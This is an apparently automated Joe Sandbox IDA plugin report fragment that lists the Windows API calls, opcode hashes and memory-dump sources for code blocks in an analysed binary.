                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                • String ID:
                                                • API String ID: 1592001646-0
                                                • Opcode ID: 3debf4159c497cb798911d18c69181ca6e1f79f5b250571d347ac980f4d9a70e
                                                • Instruction ID: d5148ed50c7442a1c90b073f158862b54e62c827c84e81460b17fbc756df0d60
                                                • Opcode Fuzzy Hash: 3debf4159c497cb798911d18c69181ca6e1f79f5b250571d347ac980f4d9a70e
                                                • Instruction Fuzzy Hash: 9D219C31E00509AFDF14DFA8D948BEEBBB8FF40344F188459E445AB241E730AA04EB54
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EC), ref: 005A280A
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A2824
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A2832
                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005A2840
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 39c0dfc31608723b70144ab688f2ff65a2ee739eb85f4c753f72808fa7c1e338
                                                • Instruction ID: 529f2b07e0fae0fc4c9482cf087dd956be51e61ec344ad3607c5499105e7dddb
                                                • Opcode Fuzzy Hash: 39c0dfc31608723b70144ab688f2ff65a2ee739eb85f4c753f72808fa7c1e338
                                                • Instruction Fuzzy Hash: AA21A435604512AFE7149B28C846FAA7F95FF86324F148158F4268B6D2CB75FD82CB90
                                                APIs
                                                  • Part of subcall function 00578D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?), ref: 00578D8C
                                                  • Part of subcall function 00578D7D: lstrcpyW.KERNEL32(00000000,?,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00578DB2
                                                  • Part of subcall function 00578D7D: lstrcmpiW.KERNEL32(00000000,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?), ref: 00578DE3
                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577923
                                                • lstrcpyW.KERNEL32(00000000,?,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577949
                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577984
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen
                                                • String ID: cdecl
                                                • API String ID: 4031866154-3896280584
                                                • Opcode ID: 716f0494483387d0945d2980e4ef76ff86f5678853b6d289869f9928cd272483
                                                • Instruction ID: c69ba510e992c9c8427f7d54099250042fd95d3cfc8c97201ea3779e63ac3bd1
                                                • Opcode Fuzzy Hash: 716f0494483387d0945d2980e4ef76ff86f5678853b6d289869f9928cd272483
                                                • Instruction Fuzzy Hash: E011EC3A201706AFCB155F34F849D7B7BA9FF99350B50802AF946C72A4EF319811E791
                                                APIs
                                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 005A56BB
                                                • _wcslen.LIBCMT ref: 005A56CD
                                                • _wcslen.LIBCMT ref: 005A56D8
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 005A5816
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend_wcslen
                                                • String ID:
                                                • API String ID: 455545452-0
                                                • Opcode ID: e992f3e23b6a9c6ffbb7e171d4bece51ceea896cc28284fccf73fd481f471708
                                                • Instruction ID: 4bcfde3f289dc3d914e2ea0f8c620b45377d4e0ceca0dd4ffae8d9c544bfb49c
                                                • Opcode Fuzzy Hash: e992f3e23b6a9c6ffbb7e171d4bece51ceea896cc28284fccf73fd481f471708
                                                • Instruction Fuzzy Hash: F611B1716006099ADF20DF658C85EEE7FACFF56760F104426F915DA081FB709A84CBA0
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00571A47
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A59
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A6F
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A8A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 0e31a196838b77742f68b178ae0ac22c09f554d10720ad6bf42074adf9516f73
                                                • Instruction ID: 0577911197ff0d9eda2f5f1547808625cc7fdeb60b4ac0123afe4dfc1f0706d7
                                                • Opcode Fuzzy Hash: 0e31a196838b77742f68b178ae0ac22c09f554d10720ad6bf42074adf9516f73
                                                • Instruction Fuzzy Hash: 5D113C3AD01219FFEB10DBA8CD85FADBB78FB04750F204091E605B7290D6716E50EB94
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 0057E1FD
                                                • MessageBoxW.USER32(?,?,?,?), ref: 0057E230
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0057E246
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0057E24D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 2880819207-0
                                                • Opcode ID: 44bb02ebff3f51d0f81813ce3abf94dedf1ecfccc55a93e6e85c111484fe78b0
                                                • Instruction ID: 7a3988581c14abb129092fbf58bd38d92f583a2ca32feb2387fa17234d5a64a6
                                                • Opcode Fuzzy Hash: 44bb02ebff3f51d0f81813ce3abf94dedf1ecfccc55a93e6e85c111484fe78b0
                                                • Instruction Fuzzy Hash: 2F112B76A04354BBC7059FA8EC4AA9F7FADEB5A310F008655F819D7291D670CD0897A0
                                                APIs
                                                • CreateThread.KERNEL32(00000000,?,0053CFF9,00000000,00000004,00000000), ref: 0053D218
                                                • GetLastError.KERNEL32 ref: 0053D224
                                                • __dosmaperr.LIBCMT ref: 0053D22B
                                                • ResumeThread.KERNEL32(00000000), ref: 0053D249
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                • String ID:
                                                • API String ID: 173952441-0
                                                • Opcode ID: 4a4ffae62088c53692ce58d9f1487e89508639edc2905e7017118c0ec1cd82db
                                                • Instruction ID: d45ad4c648fb10770a3f34014536dc83df1b13599ed28869aad4c22a23baeec2
                                                • Opcode Fuzzy Hash: 4a4ffae62088c53692ce58d9f1487e89508639edc2905e7017118c0ec1cd82db
                                                • Instruction Fuzzy Hash: 8B01C03A805205BBCB215BA5EC09AAB7F79FF82731F100219F925921D0DF718905D7B0
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
                                                • GetStockObject.GDI32(00000011), ref: 00516060
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateMessageObjectSendStockWindow
                                                • String ID:
                                                • API String ID: 3970641297-0
                                                • Opcode ID: 30323eebe2589afb3f6ad0efc8e340db9e3cd52195892856385bb894bc6ba083
                                                • Instruction ID: b107be61bab182dbec4d44bf95da99212bad452a61abb8ec84958de889274cc6
                                                • Opcode Fuzzy Hash: 30323eebe2589afb3f6ad0efc8e340db9e3cd52195892856385bb894bc6ba083
                                                • Instruction Fuzzy Hash: A611AD72501508BFEF129FA48C48EEABFA9FF1D3A4F000206FA0556110C7329CA0EBA1
                                                APIs
                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00533B56
                                                  • Part of subcall function 00533AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00533AD2
                                                  • Part of subcall function 00533AA3: ___AdjustPointer.LIBCMT ref: 00533AED
                                                • _UnwindNestedFrames.LIBCMT ref: 00533B6B
                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00533B7C
                                                • CallCatchBlock.LIBVCRUNTIME ref: 00533BA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                • String ID:
                                                • API String ID: 737400349-0
                                                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                • Instruction ID: f06acc09e4593976fed23c5dc7da80649af29af9ef4ed75e1183013d4221a169
                                                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                • Instruction Fuzzy Hash: CC01E932100149BBDF125E95CC4AEEB7F69FF98754F044014FE4866121C736E961DBA0
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005113C6,00000000,00000000,?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue), ref: 005430A5
                                                • GetLastError.KERNEL32(?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue,005B2290,FlsSetValue,00000000,00000364,?,00542E46), ref: 005430B1
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue,005B2290,FlsSetValue,00000000), ref: 005430BF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 44481e7845afbf6406d13e7582b9270bbef0e4905ff1adf5a953710904a22a5a
                                                • Instruction ID: f2fed4ac56fc8efa5cff5c1b14f288658ecd53835b938a4d63b369a4f0a037f9
                                                • Opcode Fuzzy Hash: 44481e7845afbf6406d13e7582b9270bbef0e4905ff1adf5a953710904a22a5a
                                                • Instruction Fuzzy Hash: B4012B36301622ABCB314B789C4CA977FD8BF16B65B200720F90DE7160D721DD09C6E0
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0057747F
                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00577497
                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005774AC
                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 005774CA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                • String ID:
                                                • API String ID: 1352324309-0
                                                • Opcode ID: 2196ade24e098f3051b76bb2e59be5ba11d3f95ddb171f1d1f0995e41220346c
                                                • Instruction ID: b428db24a8e2cfd7b177b09b814ab7e5dd40fe082681dfb19efc57fad476ba2b
                                                • Opcode Fuzzy Hash: 2196ade24e098f3051b76bb2e59be5ba11d3f95ddb171f1d1f0995e41220346c
                                                • Instruction Fuzzy Hash: 2D115EB52053199BEB208F24FC09F927FFDFB08B04F10C969A66AD6151D7B0E908EB50
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0C4
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0E9
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0F3
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B126
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: b169ba9a6fa6bb47b6f596badd9c1977d522f5af8ac7ca63f8567c3d9dd268cc
                                                • Instruction ID: 526469fef58ce4f13997d9a2c1d5ba6b1fd7f46e53ea40b979a20e7d06872028
                                                • Opcode Fuzzy Hash: b169ba9a6fa6bb47b6f596badd9c1977d522f5af8ac7ca63f8567c3d9dd268cc
                                                • Instruction Fuzzy Hash: 75117930E01529E7DF00AFE4E9A8BEEBF78FF5A311F008486D945B2181CB305655EB51
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00572DC5
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00572DD6
                                                • GetCurrentThreadId.KERNEL32 ref: 00572DDD
                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00572DE4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: 344b7d775e18aee94c14438d19be04ade4602f15936627034996f612069c5f11
                                                • Instruction ID: 95905d093804b29c87b2925ec2f55ab28fb7749f35a8b20dd49f0099a903da29
                                                • Opcode Fuzzy Hash: 344b7d775e18aee94c14438d19be04ade4602f15936627034996f612069c5f11
                                                • Instruction Fuzzy Hash: 38E092B16012347BD7305B76AC0DFEB3E6CFF63BA1F004015F109D20809AA0C845E6B0
                                                APIs
                                                  • Part of subcall function 00529639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
                                                  • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296A2
                                                  • Part of subcall function 00529639: BeginPath.GDI32(?), ref: 005296B9
                                                  • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296E2
                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 005A8887
                                                • LineTo.GDI32(?,?,?), ref: 005A8894
                                                • EndPath.GDI32(?), ref: 005A88A4
                                                • StrokePath.GDI32(?), ref: 005A88B2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                • String ID:
                                                • API String ID: 1539411459-0
                                                • Opcode ID: 86e18fa264ac55a03956f98fa905e907e81f48d66c16808471dbced522369982
                                                • Instruction ID: 90fb1ba7bc6ae5c7aaccbfeb9de6460cc5d76bdcd182896492d68d60d2a58c1b
                                                • Opcode Fuzzy Hash: 86e18fa264ac55a03956f98fa905e907e81f48d66c16808471dbced522369982
                                                • Instruction Fuzzy Hash: ABF03A36045659BADB125F94AC0DFDE3E59BF27310F448000FA11650E2CB795515EBA9
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 005298CC
                                                • SetTextColor.GDI32(?,?), ref: 005298D6
                                                • SetBkMode.GDI32(?,00000001), ref: 005298E9
                                                • GetStockObject.GDI32(00000005), ref: 005298F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Color$ModeObjectStockText
                                                • String ID:
                                                • API String ID: 4037423528-0
                                                • Opcode ID: fdf6603537d52c9d4adb0155221fe6a5cb8cc3c0d570d87573f395080bf49304
                                                • Instruction ID: babda23092f530fcf023f160b2149b06ff6ffa12fd385980bdd04a0b603c7173
                                                • Opcode Fuzzy Hash: fdf6603537d52c9d4adb0155221fe6a5cb8cc3c0d570d87573f395080bf49304
                                                • Instruction Fuzzy Hash: 77E06D31644284ABDB215B74BC09BE83F60FB27336F048219F6FA581E1C7724684EB10
                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 00571634
                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,005711D9), ref: 0057163B
                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005711D9), ref: 00571648
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,005711D9), ref: 0057164F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CurrentOpenProcessThreadToken
                                                • String ID:
                                                • API String ID: 3974789173-0
                                                • Opcode ID: 6d78daf8af01a9f0b2d155c7cc239e2065791bb06a459dc144e30e1677b3d84a
                                                • Instruction ID: 9fd6a7abfb0923c10368a160921ec55014196553daf74aa5e51fb240e99b5b65
                                                • Opcode Fuzzy Hash: 6d78daf8af01a9f0b2d155c7cc239e2065791bb06a459dc144e30e1677b3d84a
                                                • Instruction Fuzzy Hash: 70E08635601211DBD7201FA5AD0DB4B3F7CBF66791F148808F245C9080D6344548E754
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 0056D858
                                                • GetDC.USER32(00000000), ref: 0056D862
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0056D882
                                                • ReleaseDC.USER32(?), ref: 0056D8A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: fe3f31decb965d1eff72b2794d78ec19c2547cf145b65ae4249fd8c78f015923
                                                • Instruction ID: ca8919bc23010366900ac9e3378c651b0e0ab707e0499b170370e9ed39fb7596
                                                • Opcode Fuzzy Hash: fe3f31decb965d1eff72b2794d78ec19c2547cf145b65ae4249fd8c78f015923
                                                • Instruction Fuzzy Hash: 69E01AB4800205DFCB419FA4D80C66DBFB1FB19310F108409E806E7350CB388945AF50
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 0056D86C
                                                • GetDC.USER32(00000000), ref: 0056D876
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0056D882
